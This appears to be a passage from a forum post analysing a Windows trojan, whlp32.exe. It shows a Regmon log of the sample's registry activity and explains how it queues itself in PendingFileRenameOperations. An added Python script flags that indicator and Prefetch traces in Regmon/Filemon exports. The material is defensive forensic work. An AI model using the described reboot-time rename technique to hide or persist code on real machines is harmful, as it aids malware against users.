76130 20.02996044 whlp32.exe:1664 QueryValue HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\TransparentEnabled SUCCESS 0x1
76131 20.02997866 whlp32.exe:1664 CloseKey HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers SUCCESS
76132 20.03001308 whlp32.exe:1664 OpenKey HKCU\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers NOTFOUND
76133 20.03037242 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RPCRT4.dll NOTFOUND
76134 20.03041198 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ADVAPI32.dll NOTFOUND
76135 20.03046216 whlp32.exe:1664 OpenKey HKLM\System\CurrentControlSet\Control\Terminal Server SUCCESS Access: 0x20019
76136 20.03047838 whlp32.exe:1664 QueryValue HKLM\System\CurrentControlSet\Control\Terminal Server\TSAppCompat SUCCESS 0x0
76137 20.03049118 whlp32.exe:1664 QueryValue HKLM\System\CurrentControlSet\Control\Terminal Server\TSUserEnabled SUCCESS 0x0
76138 20.03050713 whlp32.exe:1664 CloseKey HKLM\System\CurrentControlSet\Control\Terminal Server SUCCESS
76139 20.03054450 whlp32.exe:1664 OpenKey HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon SUCCESS Access: 0x20019
76140 20.03056365 whlp32.exe:1664 QueryValue HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LeakTrack NOTFOUND
76141 20.03057812 whlp32.exe:1664 CloseKey HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon SUCCESS
76142 20.03060583 whlp32.exe:1664 OpenKey HKLM SUCCESS Access: 0x2000000
76143 20.03063272 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Diagnostics NOTFOUND
76144 20.03066348 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IMM32.DLL NOTFOUND
76145 20.03078246 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ntdll.dll NOTFOUND
76146 20.03080886 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kernel32.dll NOTFOUND
76147 20.03088152 whlp32.exe:1664 OpenKey HKLM\System\CurrentControlSet\Control\Error Message Instrument\ NOTFOUND
76148 20.03106948 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Compatibility32 SUCCESS Access: 0x20019
76149 20.03109617 whlp32.exe:1664 QueryValue HKLM\Software\Microsoft\Windows NT\CurrentVersion\Compatibility32\whlp32 NOTFOUND
76150 20.03111221 whlp32.exe:1664 CloseKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Compatibility32 SUCCESS
76151 20.03115099 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\IME Compatibility SUCCESS Access: 0x20019
76152 20.03117299 whlp32.exe:1664 QueryValue HKLM\Software\Microsoft\Windows NT\CurrentVersion\IME Compatibility\whlp32 NOTFOUND
76153 20.03118803 whlp32.exe:1664 CloseKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\IME Compatibility SUCCESS
76154 20.03132066 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows SUCCESS Access: 0x20019
76155 20.03133572 whlp32.exe:1664 QueryValue HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs SUCCESS ""
76156 20.03135820 whlp32.exe:1664 CloseKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows SUCCESS
76170 20.03285296 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Rpc\PagedBuffers NOTFOUND
76171 20.03288796 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Rpc SUCCESS Access: 0x20019
76172 20.03290569 whlp32.exe:1664 QueryValue HKLM\Software\Microsoft\Rpc\MaxRpcSize NOTFOUND
76173 20.03292620 whlp32.exe:1664 CloseKey HKLM\Software\Microsoft\Rpc SUCCESS
76174 20.03295595 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\whlp32.exe\RpcThreadPoolThrottle NOTFOUND
76175 20.03302641 whlp32.exe:1664 OpenKey HKLM\Software\Policies\Microsoft\Windows NT\Rpc NOTFOUND
76176 20.03318385 whlp32.exe:1664 OpenKey HKLM\System\CurrentControlSet\Control\ComputerName SUCCESS Access: 0x20019
76177 20.03321587 whlp32.exe:1664 OpenKey HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName SUCCESS Access: 0x20019
76178 20.03323429 whlp32.exe:1664 QueryValue HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName\ComputerName SUCCESS "WS2950"
76179 20.03325389 whlp32.exe:1664 CloseKey HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName SUCCESS
76180 20.03327550 whlp32.exe:1664 CloseKey HKLM\System\CurrentControlSet\Control\ComputerName SUCCESS
76189 20.04607113 whlp32.exe:1664 CreateKey HKLM\System\CurrentControlSet\Control\Session Manager SUCCESS Access: 0xC0000000
76190 20.04610976 whlp32.exe:1664 QueryValue HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations2 NOTFOUND
76191 20.04614400 whlp32.exe:1664 CloseKey HKLM\System\CurrentControlSet\Control\Session Manager SUCCESS
76192 20.04619187 whlp32.exe:1664 CreateKey HKLM\System\CurrentControlSet\Control\Session Manager SUCCESS Access: 0xC0000000
76193 20.04621679 whlp32.exe:1664 QueryValue HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations SUCCESS "\??\C:\Dokumente und Einstellungen\Administrator\whlp32.exe"
76194 20.04665349 whlp32.exe:1664 SetValue HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations SUCCESS "\??\C:\Dokumente und Einstellungen\Administrator\whlp32.exe"
76195 20.04667575 whlp32.exe:1664 CloseKey HKLM\System\CurrentControlSet\Control\Session Manager SUCCESS
So the trojan writes several files to the hard disk and executes them. I have not examined the code of these EXE files. The log above is therefore no guarantee that nothing bad happens to the data after all...
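The last Regmon lines are the most telling ones: whlp32.exe opens HKLM\System\CurrentControlSet\Control\Session Manager and writes its own path into PendingFileRenameOperations. That is the value MoveFileEx fills in when it is called with MOVEFILE_DELAY_UNTIL_REBOOT; the session manager works through the list at the next boot and renames every source to its target, or deletes the source when the target string is empty. The excerpt shows only one string, so it cannot be determined from the log alone whether a target follows, and writing this HKLM value only worked because the sample was run as Administrator. The Filemon lines carry a second artifact: the Prefetch file WHLP32.EXE-37867309.pf that svchost.exe creates is evidence that the dropped executable actually ran. The following script is an added example and not part of the original post; it parses Regmon/Filemon text exports in the column layout shown above and flags both indicators. The sample lines are copied from the excerpts above; the regular expressions for the export format, the list of profile directories and the function names are my own assumptions.

```python
"""Triage of Regmon/Filemon text exports (added example, not from the original post)."""
import ntpath
import re

# Regmon export columns: seq, relative time, process:pid, operation, key path, result, detail.
# The column layout is assumed from the log excerpt; other Regmon versions may differ.
REGMON_RE = re.compile(
    r"^(?P<seq>\d+)\s+(?P<time>[\d.]+)\s+(?P<proc>\S+):(?P<pid>\d+)\s+"
    r"(?P<op>OpenKey|CreateKey|QueryValue|SetValue|DeleteValue|DeleteKey|CloseKey)\s+"
    r"(?P<path>.+?)\s+(?P<result>SUCCESS|NOTFOUND|ACCDENIED|BUFOVRFLOW)(?:\s+(?P<detail>.*))?$"
)
# Filemon export columns: seq, wall-clock time, process:pid, operation (one or two words), path, result, detail.
FILEMON_RE = re.compile(
    r"^(?P<seq>\d+)\s+(?P<time>\d\d:\d\d:\d\d)\s+(?P<proc>\S+):(?P<pid>\d+)\s+"
    r"(?P<op>OPEN|CREATE|READ|WRITE|CLOSE|DELETE|QUERY INFORMATION|SET INFORMATION)\s+"
    r"(?P<path>.+?)\s+(?P<result>SUCCESS|FILE NOT FOUND|ACCESS DENIED)(?:\s+(?P<detail>.*))?$"
)
# Profile directories on German and English Windows (assumed list; extend for other locales).
PROFILE_DIRS = ("\\dokumente und einstellungen\\", "\\documents and settings\\", "\\users\\")
PFRO_KEY = r"hklm\system\currentcontrolset\control\session manager\pendingfilerenameoperations"
# Prefetch files are named <IMAGE>-<8 hex digits>.pf; their creation shows the image was started.
PREFETCH_RE = re.compile(r"\\prefetch\\(?P<image>[^\\]+)-[0-9a-f]{8}\.pf$", re.IGNORECASE)


def parse(lines, pattern):
    """Return the parsed field dicts of every line that matches the given export format."""
    return [m.groupdict() for m in map(pattern.match, lines) if m]


def dropped_and_executed(filemon_lines):
    """Paths of .exe files seen under a user profile that later got a Prefetch entry written."""
    events = parse(filemon_lines, FILEMON_RE)
    in_profile = {}
    for ev in events:
        low = ev["path"].lower()
        if low.endswith(".exe") and any(d in low for d in PROFILE_DIRS):
            in_profile.setdefault(ntpath.basename(low), ev["path"])
    hits = []
    for ev in events:
        m = PREFETCH_RE.search(ev["path"])
        if m and ev["op"] in ("CREATE", "WRITE") and ev["result"] == "SUCCESS":
            image = m.group("image").lower()
            if image in in_profile and in_profile[image] not in hits:
                hits.append(in_profile[image])
    return hits


def pending_file_renames(regmon_lines):
    """(process, source path) for every successful write to PendingFileRenameOperations."""
    hits = []
    for ev in parse(regmon_lines, REGMON_RE):
        if ev["op"] == "SetValue" and ev["path"].lower() == PFRO_KEY and ev["result"] == "SUCCESS":
            # The value is REG_MULTI_SZ source/target pairs; the export shows the source string
            # in NT object-manager form (\??\C:\...), which is stripped here for readability.
            src = (ev["detail"] or "").strip().strip('"')
            if src.startswith("\\??\\"):
                src = src[4:]
            hits.append((ev["proc"], src))
    return hits


def triage(filemon_lines, regmon_lines):
    """Human-readable findings; an empty list means neither indicator was seen."""
    findings = []
    for path in dropped_and_executed(filemon_lines):
        findings.append(f"executed from a user profile (Prefetch entry written): {path}")
    for proc, src in pending_file_renames(regmon_lines):
        findings.append(f"{proc} queued {src} in PendingFileRenameOperations "
                        "(rename, or delete if the target string is empty, at next boot)")
    return findings


# Sample input: lines copied from the Filemon and Regmon excerpts above.
FILEMON_SAMPLE = [
    r"4071 07:25:29 whlp32.exe:3984 READ C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Offset: 1024 Length: 40960",
    r"4075 07:25:30 whlp32.exe:3984 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe.Local FILE NOT FOUND Attributes: Error",
    r"4095 07:25:30 whlp32.exe:3984 OPEN C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Options: Open Access: All",
    r"4097 07:25:30 whlp32.exe:3984 SET INFORMATION C:\WINDOWS\system32\config\system.LOG SUCCESS Length: 8192",
    r"4247 07:25:30 svchost.exe:760 CREATE C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Options: OverwriteIf Access: All",
]
REGMON_SAMPLE = [
    r"76101 19.29856764 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\whlp32.exe NOTFOUND",
    r"76192 20.04619187 whlp32.exe:1664 CreateKey HKLM\System\CurrentControlSet\Control\Session Manager SUCCESS Access: 0xC0000000",
    r'76193 20.04621679 whlp32.exe:1664 QueryValue HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations SUCCESS "\??\C:\Dokumente und Einstellungen\Administrator\whlp32.exe"',
    r'76194 20.04665349 whlp32.exe:1664 SetValue HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations SUCCESS "\??\C:\Dokumente und Einstellungen\Administrator\whlp32.exe"',
]

if __name__ == "__main__":
    for finding in triage(FILEMON_SAMPLE, REGMON_SAMPLE):
        print(finding)
```

Run it as is to see the findings for the embedded sample lines, or pass a complete export with `open(path).read().splitlines()` for both arguments. On a live machine the same value can be inspected with `reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v PendingFileRenameOperations`; a non-empty entry pointing into a user profile deserves a look before the next reboot, because the reboot is what carries out the queued rename or delete.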

